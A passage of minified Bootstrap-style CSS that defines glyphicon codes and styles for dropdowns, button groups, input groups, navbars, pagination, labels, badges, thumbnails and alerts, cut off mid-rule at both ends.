weet:before{content:"\e115"}.glyphicon-shopping-cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\e117"}.glyphicon-folder-open:before{content:"\e118"}.glyphicon-resize-vertical:before{content:"\e119"}.glyphicon-resize-horizontal:before{content:"\e120"}.glyphicon-hdd:before{content:"\e121"}.glyphicon-bullhorn:before{content:"\e122"}.glyphicon-certificate:before{content:"\e124"}.glyphicon-thumbs-up:before{content:"\e125"}.glyphicon-thumbs-down:before{content:"\e126"}.glyphicon-hand-right:before{content:"\e127"}.glyphicon-hand-left:before{content:"\e128"}.glyphicon-hand-up:before{content:"\e129"}.glyphicon-hand-down:before{content:"\e130"}.glyphicon-circle-arrow-right:before{content:"\e131"}.glyphicon-circle-arrow-left:before{content:"\e132"}.glyphicon-circle-arrow-up:before{content:"\e133"}.glyphicon-circle-arrow-down:before{content:"\e134"}.glyphicon-globe:before{content:"\e135"}.glyphicon-tasks:before{content:"\e137"}.glyphicon-filter:before{content:"\e138"}.glyphicon-fullscreen:before{content:"\e140"}.glyphicon-dashboard:before{content:"\e141"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e149"}.glyphicon-sort:before{content:"\e150"}.glyphicon-sort-by-alphabet:before{content:"\e151"}.glyphicon-sort-by-alphabet-alt:before{content:"\e152"}.glyphicon-sort-by-order:before{content:"\e153"}.glyphicon-sort-by-order-alt:before{content:"\e154"}.glyphicon-sort-by-attributes:before{content:"\e155"}.glyphicon-sort-by-attributes-alt:before{content:"\e156"}.glyphicon-unchecked:before{content:"\e157"}.glyphicon-expand:before{content:"\e158"}.glyphicon-collapse-down:before{content:"\e159"}.glyphicon-collapse-up:before{content:"\e160"}.glyphicon-log-in:before{content:"\e161"}.glyphicon-flash:before{content:"\e162"}.glyphicon-log-out:before{content:"\e163"}.glyphicon-new-window:before{content:"\e164"}.glyphicon-record:before{content:"\e165"}.glyphicon-save:before{content:"\e166"}.glyphicon-open:before{content:"\e167"}.glyphicon-saved:before{content:"\e168"}.glyphicon-import:before{content:"\e169"}.glyphicon-export:before{content:"\e170"}.glyphicon-send:before{content:"\e171"}.glyphicon-floppy-disk:before{content:"\e172"}.glyphicon-floppy-saved:before{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphicon-cutlery:before{content:"\e179"}.glyphicon-header:before{content:"\e180"}.glyphicon-compressed:before{content:"\e181"}.glyphicon-earphone:before{content:"\e182"}.glyphicon-phone-alt:before{content:"\e183"}.glyphicon-tower:before{content:"\e184"}.glyphicon-stats:before{content:"\e185"}.glyphicon-sd-video:before{content:"\e186"}.glyphicon-hd-video:before{content:"\e187"}.glyphicon-subtitles:before{content:"\e188"}.glyphicon-sound-stereo:before{content:"\e189"}.glyphicon-sound-dolby:before{content:"\e190"}.glyphicon-sound-5-1:before{content:"\e191"}.glyphicon-sound-6-1:before{content:"\e192"}.glyphicon-sound-7-1:before{content:"\e193"}.glyphicon-copyright-mark:before{content:"\e194"}.glyphicon-registration-mark:before{content:"\e195"}.glyphicon-cloud-download:before{content:"\e197"}.glyphicon-cloud-upload:before{content:"\e198"}.glyphicon-tree-conifer:before{content:"\e199"}.glyphicon-tree-deciduous:before{content:"\e200"}.glyphicon-briefcase:before{content:"\1f4bc"}.glyphicon-calendar:before{content:"\1f4c5"}.glyphicon-pushpin:before{content:"\1f4cc"}.glyphicon-paperclip:before{content:"\1f4ce"}.glyphicon-camera:before{content:"\1f4f7"}.glyphicon-lock:before{content:"\1f512"}.glyphicon-bell:before{content:"\1f514"}.glyphicon-bookmark:before{content:"\1f516"}.glyphicon-fire:before{content:"\1f525"}.glyphicon-wrench:before{content:"\1f527"}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px solid #000;border-right:4px solid transparent;border-bottom:0 dotted;border-left:4px solid transparent;content:""}.dropdown{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;list-style:none;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,0.175);box-shadow:0 6px 12px rgba(0,0,0,0.175);background-clip:padding-box}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:normal;line-height:1.428571429;color:#333;white-space:nowrap}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{color:#fff;text-decoration:none;background-color:#428bca}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{color:#fff;text-decoration:none;background-color:#428bca;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{color:#999}.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.428571429;color:#999}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{border-top:0 dotted;border-bottom:4px solid #000;content:""}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:1px}@media(min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}}.btn-default .caret{border-top-color:#333}.btn-primary .caret,.btn-success .caret,.btn-warning .caret,.btn-danger .caret,.btn-info .caret{border-top-color:#fff}.dropup .btn-default .caret{border-bottom-color:#333}.dropup .btn-primary .caret,.dropup .btn-success .caret,.dropup .btn-warning .caret,.dropup .btn-danger .caret,.dropup .btn-info .caret{border-bottom-color:#fff}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group>.btn,.btn-group-vertical>.btn{position:relative;float:left}.btn-group>.btn:hover,.btn-group-vertical>.btn:hover,.btn-group>.btn:focus,.btn-group-vertical>.btn:focus,.btn-group>.btn:active,.btn-group-vertical>.btn:active,.btn-group>.btn.active,.btn-group-vertical>.btn.active{z-index:2}.btn-group>.btn:focus,.btn-group-vertical>.btn:focus{outline:0}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar .btn-group{float:left}.btn-toolbar>.btn+.btn,.btn-toolbar>.btn-group+.btn,.btn-toolbar>.btn+.btn-group,.btn-toolbar>.btn-group+.btn-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child>.btn:last-child,.btn-group>.btn-group:first-child>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child>.btn:first-child{border-bottom-left-radius:0;border-top-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group-xs>.btn{padding:5px 10px;padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-sm>.btn{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-lg>.btn{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child>.btn:last-child,.btn-group-vertical>.btn-group:first-child>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child>.btn:first-child{border-top-right-radius:0;border-top-left-radius:0}.btn-group-justified{display:table;width:100%;border-collapse:separate;table-layout:fixed}.btn-group-justified .btn{display:table-cell;float:none;width:1%}[data-toggle="buttons"]>.btn>input[type="radio"],[data-toggle="buttons"]>.btn>input[type="checkbox"]{display:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group.col{float:none;padding-right:0;padding-left:0}.input-group .form-control{width:100%;margin-bottom:0}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:45px;line-height:45px}textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-addon,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:normal;line-height:1;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type="radio"],.input-group-addon input[type="checkbox"]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:last-child>.btn,.input-group-btn:last-child>.dropdown-toggle,.input-group-btn:first-child>.btn:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-4px}.input-group-btn>.btn:hover,.input-group-btn>.btn:active{z-index:2}.nav{padding-left:0;margin-bottom:0;list-style:none}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav>li{position:relative;display:block}.nav>li>a{position:relative;display:block;padding:10px 15px}.nav>li>a:hover,.nav>li>a:focus{text-decoration:none;background-color:#eee}.nav>li.disabled>a{color:#999}.nav>li.disabled>a:hover,.nav>li.disabled>a:focus{color:#999;text-decoration:none;cursor:not-allowed;background-color:transparent}.nav .open>a,.nav .open>a:hover,.nav .open>a:focus{background-color:#eee;border-color:#428bca}.nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.nav>li>a>img{max-width:none}.nav-tabs{border-bottom:1px solid #ddd}.nav-tabs>li{float:left;margin-bottom:-1px}.nav-tabs>li>a{margin-right:2px;line-height:1.428571429;border:1px solid transparent;border-radius:4px 4px 0 0}.nav-tabs>li>a:hover{border-color:#eee #eee #ddd}.nav-tabs>li.active>a,.nav-tabs>li.active>a:hover,.nav-tabs>li.active>a:focus{color:#555;cursor:default;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent}.nav-tabs.nav-justified{width:100%;border-bottom:0}.nav-tabs.nav-justified>li{float:none}.nav-tabs.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}}.nav-tabs.nav-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs.nav-justified>.active>a{border-bottom-color:#fff}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:5px}.nav-pills>li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:hover,.nav-pills>li.active>a:focus{color:#fff;background-color:#428bca}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified>li{float:none}.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-justified>li{display:table-cell;width:1%}}.nav-tabs-justified{border-bottom:0}.nav-tabs-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs-justified>.active>a{border-bottom-color:#fff}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tab-content>.tab-pane,.pill-content>.pill-pane{display:none}.tab-content>.active,.pill-content>.active{display:block}.nav .caret{border-top-color:#428bca;border-bottom-color:#428bca}.nav a:hover .caret{border-top-color:#2a6496;border-bottom-color:#2a6496}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-right-radius:0;border-top-left-radius:0}.navbar{position:relative;z-index:1000;min-height:50px;margin-bottom:20px;border:1px solid transparent}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}@media(min-width:768px){.navbar{border-radius:4px}}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}@media(min-width:768px){.navbar-header{float:left}}.navbar-collapse{max-height:340px;padding-right:15px;padding-left:15px;overflow-x:visible;border-top:1px solid transparent;box-shadow:inset 0 1px 0 rgba(255,255,255,0.1);-webkit-overflow-scrolling:touch}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse.in{overflow-y:auto}@media(min-width:768px){.navbar-collapse{width:auto;border-top:0;box-shadow:none}.navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}.navbar-collapse.in{overflow-y:visible}.navbar-collapse .navbar-nav.navbar-left:first-child{margin-left:-15px}.navbar-collapse .navbar-nav.navbar-right:last-child{margin-right:-15px}.navbar-collapse .navbar-text:last-child{margin-right:0}}.container>.navbar-header,.container>.navbar-collapse{margin-right:-15px;margin-left:-15px}@media(min-width:768px){.container>.navbar-header,.container>.navbar-collapse{margin-right:0;margin-left:0}}.navbar-static-top{border-width:0 0 1px}@media(min-width:768px){.navbar-static-top{border-radius:0}}.navbar-fixed-top,.navbar-fixed-bottom{position:fixed;right:0;left:0;border-width:0 0 1px}@media(min-width:768px){.navbar-fixed-top,.navbar-fixed-bottom{border-radius:0}}.navbar-fixed-top{top:0;z-index:1030}.navbar-fixed-bottom{bottom:0;margin-bottom:0}.navbar-brand{float:left;padding:15px 15px;font-size:18px;line-height:20px}.navbar-brand:hover,.navbar-brand:focus{text-decoration:none}@media(min-width:768px){.navbar>.container .navbar-brand{margin-left:-15px}}.navbar-toggle{position:relative;float:right;padding:9px 10px;margin-top:8px;margin-right:15px;margin-bottom:8px;background-color:transparent;border:1px solid transparent;border-radius:4px}.navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}.navbar-toggle .icon-bar+.icon-bar{margin-top:4px}@media(min-width:768px){.navbar-toggle{display:none}}.navbar-nav{margin:7.5px -15px}.navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}@media(max-width:767px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;box-shadow:none}.navbar-nav .open .dropdown-menu>li>a,.navbar-nav .open .dropdown-menu .dropdown-header{padding:5px 15px 5px 25px}.navbar-nav .open .dropdown-menu>li>a{line-height:20px}.navbar-nav .open .dropdown-menu>li>a:hover,.navbar-nav .open .dropdown-menu>li>a:focus{background-image:none}}@media(min-width:768px){.navbar-nav{float:left;margin:0}.navbar-nav>li{float:left}.navbar-nav>li>a{padding-top:15px;padding-bottom:15px}}@media(min-width:768px){.navbar-left{float:left!important}.navbar-right{float:right!important}}.navbar-form{padding:10px 15px;margin-top:8px;margin-right:-15px;margin-bottom:8px;margin-left:-15px;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1);box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1)}@media(min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.navbar-form .form-control{display:inline-block}.navbar-form .radio,.navbar-form .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.navbar-form .radio input[type="radio"],.navbar-form .checkbox input[type="checkbox"]{float:none;margin-left:0}}@media(max-width:767px){.navbar-form .form-group{margin-bottom:5px}}@media(min-width:768px){.navbar-form{width:auto;padding-top:0;padding-bottom:0;margin-right:0;margin-left:0;border:0;-webkit-box-shadow:none;box-shadow:none}}.navbar-nav>li>.dropdown-menu{margin-top:0;border-top-right-radius:0;border-top-left-radius:0}.navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{border-bottom-right-radius:0;border-bottom-left-radius:0}.navbar-nav.pull-right>li>.dropdown-menu,.navbar-nav>li>.dropdown-menu.pull-right{right:0;left:auto}.navbar-btn{margin-top:8px;margin-bottom:8px}.navbar-text{float:left;margin-top:15px;margin-bottom:15px}@media(min-width:768px){.navbar-text{margin-right:15px;margin-left:15px}}.navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}.navbar-default .navbar-brand{color:#777}.navbar-default .navbar-brand:hover,.navbar-default .navbar-brand:focus{color:#5e5e5e;background-color:transparent}.navbar-default .navbar-text{color:#777}.navbar-default .navbar-nav>li>a{color:#777}.navbar-default .navbar-nav>li>a:hover,.navbar-default .navbar-nav>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:hover,.navbar-default .navbar-nav>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:hover,.navbar-default .navbar-nav>.disabled>a:focus{color:#ccc;background-color:transparent}.navbar-default .navbar-toggle{border-color:#ddd}.navbar-default .navbar-toggle:hover,.navbar-default .navbar-toggle:focus{background-color:#ddd}.navbar-default .navbar-toggle .icon-bar{background-color:#ccc}.navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e6e6e6}.navbar-default .navbar-nav>.dropdown>a:hover .caret,.navbar-default .navbar-nav>.dropdown>a:focus .caret{border-top-color:#333;border-bottom-color:#333}.navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:hover,.navbar-default .navbar-nav>.open>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.open>a .caret,.navbar-default .navbar-nav>.open>a:hover .caret,.navbar-default .navbar-nav>.open>a:focus .caret{border-top-color:#555;border-bottom-color:#555}.navbar-default .navbar-nav>.dropdown>a .caret{border-top-color:#777;border-bottom-color:#777}@media(max-width:767px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#ccc;background-color:transparent}}.navbar-default .navbar-link{color:#777}.navbar-default .navbar-link:hover{color:#333}.navbar-inverse{background-color:#222;border-color:#080808}.navbar-inverse .navbar-brand{color:#999}.navbar-inverse .navbar-brand:hover,.navbar-inverse .navbar-brand:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-text{color:#999}.navbar-inverse .navbar-nav>li>a{color:#999}.navbar-inverse .navbar-nav>li>a:hover,.navbar-inverse .navbar-nav>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:hover,.navbar-inverse .navbar-nav>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:hover,.navbar-inverse .navbar-nav>.disabled>a:focus{color:#444;background-color:transparent}.navbar-inverse .navbar-toggle{border-color:#333}.navbar-inverse .navbar-toggle:hover,.navbar-inverse .navbar-toggle:focus{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#101010}.navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:hover,.navbar-inverse .navbar-nav>.open>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.dropdown>a:hover .caret{border-top-color:#fff;border-bottom-color:#fff}.navbar-inverse .navbar-nav>.dropdown>a .caret{border-top-color:#999;border-bottom-color:#999}.navbar-inverse .navbar-nav>.open>a .caret,.navbar-inverse .navbar-nav>.open>a:hover .caret,.navbar-inverse .navbar-nav>.open>a:focus .caret{border-top-color:#fff;border-bottom-color:#fff}@media(max-width:767px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#999}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#444;background-color:transparent}}.navbar-inverse .navbar-link{color:#999}.navbar-inverse .navbar-link:hover{color:#fff}.breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}.breadcrumb>li{display:inline-block}.breadcrumb>li+li:before{padding:0 5px;color:#ccc;content:"/\00a0"}.breadcrumb>.active{color:#999}.pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}.pagination>li{display:inline}.pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;margin-left:-1px;line-height:1.428571429;text-decoration:none;background-color:#fff;border:1px solid #ddd}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.pagination>li:last-child>a,.pagination>li:last-child>span{border-top-right-radius:4px;border-bottom-right-radius:4px}.pagination>li>a:hover,.pagination>li>span:hover,.pagination>li>a:focus,.pagination>li>span:focus{background-color:#eee}.pagination>.active>a,.pagination>.active>span,.pagination>.active>a:hover,.pagination>.active>span:hover,.pagination>.active>a:focus,.pagination>.active>span:focus{z-index:2;color:#fff;cursor:default;background-color:#428bca;border-color:#428bca}.pagination>.disabled>span,.pagination>.disabled>a,.pagination>.disabled>a:hover,.pagination>.disabled>a:focus{color:#999;cursor:not-allowed;background-color:#fff;border-color:#ddd}.pagination-lg>li>a,.pagination-lg>li>span{padding:10px 16px;font-size:18px}.pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-bottom-left-radius:6px;border-top-left-radius:6px}.pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-top-right-radius:6px;border-bottom-right-radius:6px}.pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px}.pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-bottom-left-radius:3px;border-top-left-radius:3px}.pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-top-right-radius:3px;border-bottom-right-radius:3px}.pager{padding-left:0;margin:20px 0;text-align:center;list-style:none}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager:before,.pager:after{display:table;content:" "}.pager:after{clear:both}.pager li{display:inline}.pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}.pager li>a:hover,.pager li>a:focus{text-decoration:none;background-color:#eee}.pager .next>a,.pager .next>span{float:right}.pager .previous>a,.pager .previous>span{float:left}.pager .disabled>a,.pager .disabled>a:hover,.pager .disabled>a:focus,.pager .disabled>span{color:#999;cursor:not-allowed;background-color:#fff}.label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}.label[href]:hover,.label[href]:focus{color:#fff;text-decoration:none;cursor:pointer}.label:empty{display:none}.label-default{background-color:#999}.label-default[href]:hover,.label-default[href]:focus{background-color:#808080}.label-primary{background-color:#428bca}.label-primary[href]:hover,.label-primary[href]:focus{background-color:#3071a9}.label-success{background-color:#5cb85c}.label-success[href]:hover,.label-success[href]:focus{background-color:#449d44}.label-info{background-color:#5bc0de}.label-info[href]:hover,.label-info[href]:focus{background-color:#31b0d5}.label-warning{background-color:#f0ad4e}.label-warning[href]:hover,.label-warning[href]:focus{background-color:#ec971f}.label-danger{background-color:#d9534f}.label-danger[href]:hover,.label-danger[href]:focus{background-color:#c9302c}.badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:bold;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;background-color:#999;border-radius:10px}.badge:empty{display:none}a.badge:hover,a.badge:focus{color:#fff;text-decoration:none;cursor:pointer}.btn .badge{position:relative;top:-1px}a.list-group-item.active>.badge,.nav-pills>.active>a>.badge{color:#428bca;background-color:#fff}.nav-pills>li>a>.badge{margin-left:3px}.jumbotron{padding:30px;margin-bottom:30px;font-size:21px;font-weight:200;line-height:2.1428571435;color:inherit;background-color:#eee}.jumbotron h1{line-height:1;color:inherit}.jumbotron p{line-height:1.4}.container .jumbotron{border-radius:6px}@media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}.container .jumbotron{padding-right:60px;padding-left:60px}.jumbotron h1{font-size:63px}}.thumbnail{display:inline-block;display:block;height:auto;max-width:100%;padding:4px;line-height:1.428571429;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;transition:all .2s ease-in-out}.thumbnail>img{display:block;height:auto;max-width:100%}a.thumbnail:hover,a.thumbnail:focus{border-color:#428bca}.thumbnail>img{margin-right:auto;margin-left:auto}.thumbnail .caption{padding:9px;color:#333}.alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}.alert h4{margin-top:0;color:inherit}.alert .alert-link{font-weight:bold}.alert>p,.alert>ul{margin-bottom:0}.alert>p+p{margin-top:5px}.alert-dismissable{padding-right:35px}.alert-dismissable .close{position:relative;top:-2px;right:-21px;color:inherit}.alert-success{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.alert-success hr{border-top-color:#c9e2b3}.alert-success 